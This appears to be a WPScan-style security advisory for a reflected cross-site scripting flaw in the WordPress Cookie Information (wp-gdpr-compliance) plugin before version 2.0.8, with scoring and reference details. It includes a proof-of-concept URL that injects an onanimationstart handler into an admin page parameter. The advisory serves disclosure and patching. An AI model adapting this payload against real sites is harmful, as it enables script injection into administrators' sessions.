Cookie Information < 2.0.8 - Reflected Cross-Site Scripting

2022-02-2100:00:00

Krzysztof Zając

wpscan.com

0.001 Low

EPSS

Percentile

41.5%

JSON

The plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue

PoC

https://example.com/wp-admin/admin.php?page=wp-gdpr-compliance&x;='+onanimationstart%3Dalert(/XSS/)+style%3Danimation-name%3Arotation+x

CPENameOperatorVersion
wp-gdpr-compliancelt2.0.8

CPE	Name	Operator	Version
	wp-gdpr-compliance	lt	2.0.8

References

plugins.trac.wordpress.org/changeset/2681371

0.001 Low

EPSS

Percentile

41.5%

JSON

Related for WPVDB-ID:2C735365-69C0-4652-B48E-C4A192DFE0D1